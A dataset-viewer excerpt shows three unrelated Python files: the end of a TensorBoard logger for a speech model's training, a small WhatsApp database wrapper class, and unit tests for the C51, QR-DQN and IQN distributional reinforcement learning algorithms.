self.add_scalar(f"{prepend}/{loss_name}", reduced_loss, iteration)
def plot_model_params(self, model, iteration):
for tag, value in model.named_parameters():
tag = tag.replace('.', '/')
self.add_histogram(tag, value.data.cpu().numpy(), iteration)
def log_training(self, reduced_loss_dict, expavg_loss_dict, best_loss_dict, grad_norm, learning_rate, duration,
iteration, teacher_force_till, p_teacher_forcing, drop_frame_rate):
prepend = 'training'
if iteration%20 == 0:
self.plot_loss_dict(reduced_loss_dict, iteration, f'{prepend}')
if expavg_loss_dict is not None:
self.plot_loss_dict(expavg_loss_dict, iteration, f'{prepend}_smoothed')
if best_loss_dict is not None:
if self.best_loss_dict is None:
self.best_loss_dict = {k: 0. for k in best_loss_dict.keys()}
for loss_name, reduced_loss in best_loss_dict.items():# for each loss value in the dictionary
if self.best_loss_dict[loss_name] != reduced_loss or iteration%10000 == 0:# if loss has updated or changed since last time
self.best_loss_dict[loss_name] = reduced_loss
self.add_scalar(f'{prepend}_smoothed_best/{loss_name}', reduced_loss, iteration)# plot the new value
self.add_scalar("grad.norm", grad_norm, iteration)
if iteration%100 == 0:
self.add_scalar(f"{prepend}.learning_rate", learning_rate, iteration)
self.add_scalar(f"{prepend}/p_teacher_forcing" , p_teacher_forcing, iteration)
self.add_scalar(f"{prepend}/teacher_force_till", teacher_force_till, iteration)
self.add_scalar(f"{prepend}/drop_frame_rate", drop_frame_rate, iteration)
self.add_scalar(f"{prepend}.duration", duration, iteration)
def log_validation(self, reduced_loss_dict, reduced_bestval_loss_dict, model, y, y_pred, iteration, val_teacher_force_till, val_p_teacher_forcing):
prepend = 'validation'
# plot distribution of parameters
if iteration%20000 == 0:
self.plot_model_params(model, iteration)
# plot datapoints/graphs
self.plot_loss_dict(reduced_loss_dict, iteration, f'{prepend}')
self.plot_loss_dict(reduced_bestval_loss_dict, iteration, f'{prepend}_best')
# plot spects / imgs
n_items = min(self.n_items, y['gt_mel'].shape[0])
mel_L1_map = torch.nn.L1Loss(reduction='none')(y_pred['pred_mel_postnet'], y['gt_mel'])
mel_L1_map[:, -1, -1] = 5.0 # because otherwise the color map scale is crap
for idx in range(n_items):# plot target spectrogram of longest audio file(s)
self.add_image(
f"{prepend}_alignment/{idx}",
plot_alignment_to_numpy(y_pred['alignments'][idx].data.cpu().numpy().T),
iteration, dataformats='HWC')
self.add_image(
f"{prepend}_mel_pred/{idx}",
plot_spectrogram_to_numpy(y_pred['pred_mel_postnet'][idx].data.cpu().numpy()),
iteration, dataformats='HWC')
self.add_image(
f"{prepend}_mel_SE/{idx}",
plot_spectrogram_to_numpy(mel_L1_map[idx].data.cpu().numpy()),
iteration, dataformats='HWC')
if not self.plotted_targets_val:
self.add_image(
f"{prepend}_mel_gt/{idx}",
plot_spectrogram_to_numpy(y['gt_mel'][idx].data.cpu().numpy()),
iteration, dataformats='HWC')
self.plotted_targets_val = True # target spect doesn't change so only needs to be plotted once.
def log_infer(self, reduced_loss_dict, reduced_bestval_loss_dict, model, y, y_pred, iteration, val_teacher_force_till, val_p_teacher_forcing):
prepend = 'inference'
# plot datapoints/graphs
self.plot_loss_dict(reduced_loss_dict, iteration, f'{prepend}')
self.plot_loss_dict(reduced_bestval_loss_dict, iteration, f'{prepend}_best')
# plot spects / imgs
n_items = min(self.n_items, y['gt_mel'].shape[0])
for idx in range(n_items):# plot target spectrogram of longest audio file(s)
self.add_image(
f"{prepend}_alignment/{idx}",
plot_alignment_to_numpy(y_pred['alignments'][idx].data.cpu().numpy().T),
iteration, dataformats='HWC')
self.add_image(
f"{prepend}_mel_pred/{idx}",
plot_spectrogram_to_numpy(y_pred['pred_mel_postnet'][idx].data.cpu().numpy()),
iteration, dataformats='HWC')
if not self.plotted_targets_inf:
self.add_image(
f"{prepend}_mel_gt/{idx}",
plot_spectrogram_to_numpy(y['gt_mel'][idx].data.cpu().numpy()),
iteration, dataformats='HWC')
self.plotted_targets_inf = True # target spect doesn't change so only needs to be plotted once.
|
106131
|
from WhatsAppManifest.manifest.whatsapp.path import Path
from WhatsAppManifest.automator.whatsapp.database.base import WhatsAppDatabase
class WhatsAppDatabaseWA(WhatsAppDatabase):
"""
WhatsApp WA Database
"""
_database = Path.wa
|
106158
|
from flare.algorithm_zoo.distributional_rl_algorithms import C51
from flare.model_zoo.distributional_rl_models import C51Model
from flare.algorithm_zoo.distributional_rl_algorithms import QRDQN
from flare.model_zoo.distributional_rl_models import QRDQNModel
from flare.algorithm_zoo.distributional_rl_algorithms import IQN
from flare.model_zoo.distributional_rl_models import IQNModel
import numpy as np
import math
import torch
import torch.nn as nn
import unittest
class TestC51(unittest.TestCase):
def initialize(self, bins=2):
inner_size = 256
num_actions = 3
state_shape = [1]
mlp = nn.Sequential(nn.Linear(inner_size, inner_size), nn.ReLU())
model = C51Model(
dims=state_shape,
num_actions=num_actions,
perception_net=mlp,
vmax=10,
vmin=-10,
bins=bins)
alg = C51(model=model,
exploration_end_steps=500000,
update_ref_interval=100)
return model, alg
def test_select_q_distribution(self):
model, alg = self.initialize()
distribution = [[[0.1, 0.9], [0.2, 0.8], [0.3, 0.7]],
[[0.4, 0.6], [0.5, 0.5], [0.6, 0.4]]]
action = [0, 2]
expected = np.array(
[d[a] for d, a in zip(distribution, action)]).flatten()
actual = alg.select_q_distribution(
torch.tensor(distribution), torch.tensor(action)).numpy().flatten()
self.assertEqual(len(expected), len(actual))
for x, y in zip(expected, actual):
self.assertAlmostEqual(x, y)
def test_check_alive(self):
model, alg = self.initialize(3)
values = [[[1, 2, 3]] * 2, [[3, 4, 5]] * 2, [[5, 6, 7]] * 2]
alive = [1, 0, 1]
next_values = torch.tensor(values).float()
next_alive = torch.tensor(alive).float().view(-1, 1)
expected = [
a if b == 1 else [[0, 1, 0]] * 2 for a, b in zip(values, alive)
]
expected = np.array(expected)
actual = alg.check_alive(next_values, next_alive).numpy()
self.assertEqual(expected.shape, actual.shape)
for x, y in zip(expected.flatten(), actual.flatten()):
self.assertAlmostEqual(x, y)
def one_backup(self, r, q, discount, model):
N = len(q)
m = [0.] * N
for j in xrange(N):
Tz = r + discount * model.atoms[j]
Tz = min(Tz, 10)
Tz = max(Tz, -10)
b = (Tz + 10.) / model.delta_z
l = int(math.floor(b))
u = int(math.ceil(b))
m[l] += q[j] * (u - b)
m[u] += q[j] * (b - l)
return m
def test_backup(self):
model, alg = self.initialize()
discount = 0.9
reward = [[1.5], [-0.2], [0.]]
next_q_distribution = [[0.1, 0.9], [0.2, 0.8], [0.3, 0.7]]
expected = np.array([
self.one_backup(r[0], q, discount, model)
for r, q in zip(reward, next_q_distribution)
]).flatten()
actual = alg.backup(
model.atoms,
torch.FloatTensor([model.vmax]),
torch.FloatTensor([model.vmin]), model.delta_z,
torch.tensor(reward), discount,
torch.tensor(next_q_distribution)).numpy().flatten()
self.assertEqual(len(expected), len(actual))
for x, y in zip(expected, actual):
self.assertAlmostEqual(x, y)
def test_get_current_values(self):
model, alg = self.initialize()
A = "A"
B = "B"
alg.model.value = lambda x, y: (x, y)
A_hat, B_hat = alg.get_current_values(A, B)
self.assertEqual(A, A_hat)
self.assertEqual(B, B_hat)
def test_get_next_values(self):
model, alg = self.initialize()
A = "A"
B = "B"
C = {"q_value": A}
alg.ref_model.value = lambda x, y: (x, y)
C_hat, B_hat, A_hat = alg.get_next_values(C, B)
self.assertEqual(A, A_hat)
self.assertEqual(B, B_hat)
self.assertEqual(C, C_hat)
class TestQRDQN(unittest.TestCase):
def initialize(self, bins=2):
inner_size = 256
num_actions = 3
state_shape = [1]
N = 32
mlp = nn.Sequential(nn.Linear(inner_size, inner_size), nn.ReLU())
alg = QRDQN(
model=QRDQNModel(
dims=state_shape,
num_actions=num_actions,
perception_net=mlp,
N=N),
exploration_end_steps=500000,
update_ref_interval=100)
return alg
def test_check_alive(self):
alg = self.initialize()
values = [[[1], [2], [3]], [[3], [4], [5]], [[5], [6], [7]]]
alive = [1, 0, 1]
next_values = torch.tensor(values).float()
next_alive = torch.tensor(alive).float().view(-1, 1)
expected = [
a if b == 1 else [[0], [0], [0]] for a, b in zip(values, alive)
]
expected = np.array(expected)
actual = alg.check_alive(next_values, next_alive).numpy()
self.assertEqual(expected.shape, actual.shape)
for x, y in zip(expected.flatten(), actual.flatten()):
self.assertAlmostEqual(x, y)
def huber_loss(self, u, k=1):
if abs(u) <= k:
return 0.5 * u * u
else:
return k * (abs(u) - 0.5 * k)
def quantile_huber_loss(self, u, tau, k=1):
if u < 0:
delta = 1
else:
delta = 1
return abs(tau - delta) * self.huber_loss(u, k)
def expection_quantile_huber_loss(self, theta, Ttheta, tau, k=1):
r1 = 0
for theta_i, tau_i in zip(theta, tau):
r2 = 0
for Ttheta_j in Ttheta:
r2 += self.quantile_huber_loss(Ttheta_j - theta_i, tau_i, k)
r1 += r2 / len(Ttheta)
return r1
def batch_expection_quantile_huber_loss(self,
q_distribution,
critic_value,
tau,
k=1):
expected = []
for theta, Ttheta, t in zip(q_distribution, critic_value, tau):
expected.append(
self.expection_quantile_huber_loss(theta, Ttheta, t, k))
return expected
def test_get_quantile_huber_loss(self):
alg = self.initialize()
critic_value = [[-1., 2.], [3., 4.], [-5., -5.]]
q_distribution = [[9., 8.5], [7., 6.], [-5., -5.]]
tau = [[0.3, 0.6], [0.4, 0.8], [0.6, 0.1]]
expected = self.batch_expection_quantile_huber_loss(
q_distribution, critic_value, tau, k=1)
expected = np.array(expected)
critic_value = torch.tensor(critic_value)
q_distribution = torch.tensor(q_distribution)
tau = torch.tensor(tau)
actual = alg.get_quantile_huber_loss(critic_value, q_distribution,
tau).view(-1).numpy()
self.assertEqual(expected.shape, actual.shape)
for x, y in zip(expected.flatten(), actual.flatten()):
self.assertAlmostEqual(x, y, places=6)
class TestIQN(unittest.TestCase):
def initialize(self):
inner_size = 256
num_actions = 3
state_shape = [1]
mlp = nn.Sequential(nn.Linear(inner_size, inner_size), nn.ReLU())
model = IQNModel(
dims=state_shape,
num_actions=num_actions,
perception_net=mlp,
inner_size=inner_size)
alg = IQN(model=model,
exploration_end_steps=500000,
update_ref_interval=100)
return alg
def test_get_current_values(self):
alg = self.initialize()
A = "A"
B = "B"
N = 10
alg.model.value = lambda x, y, z: (x, y, z)
alg.N = N
A_hat, B_hat, N_hat = alg.get_current_values(A, B)
self.assertEqual(A, A_hat)
self.assertEqual(B, B_hat)
self.assertEqual(N, N_hat)
def tdest_get_next_values(self):
alg = self.initialize()
next_values = "A"
next_value = "B"
next_states_update = "C"
a_list = [next_values, {"q_value": next_value}]
alg.ref_model.value = lambda x, y, z: (x, y, z)
A_hat, B_hat, C_hat = alg.get_next_values(a_list, next_states_update)
self.assertEqual(next_values, A_hat)
self.assertEqual(next_states_update, B_hat)
self.assertEqual(next_value, C_hat)
if __name__ == "__main__":
unittest.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.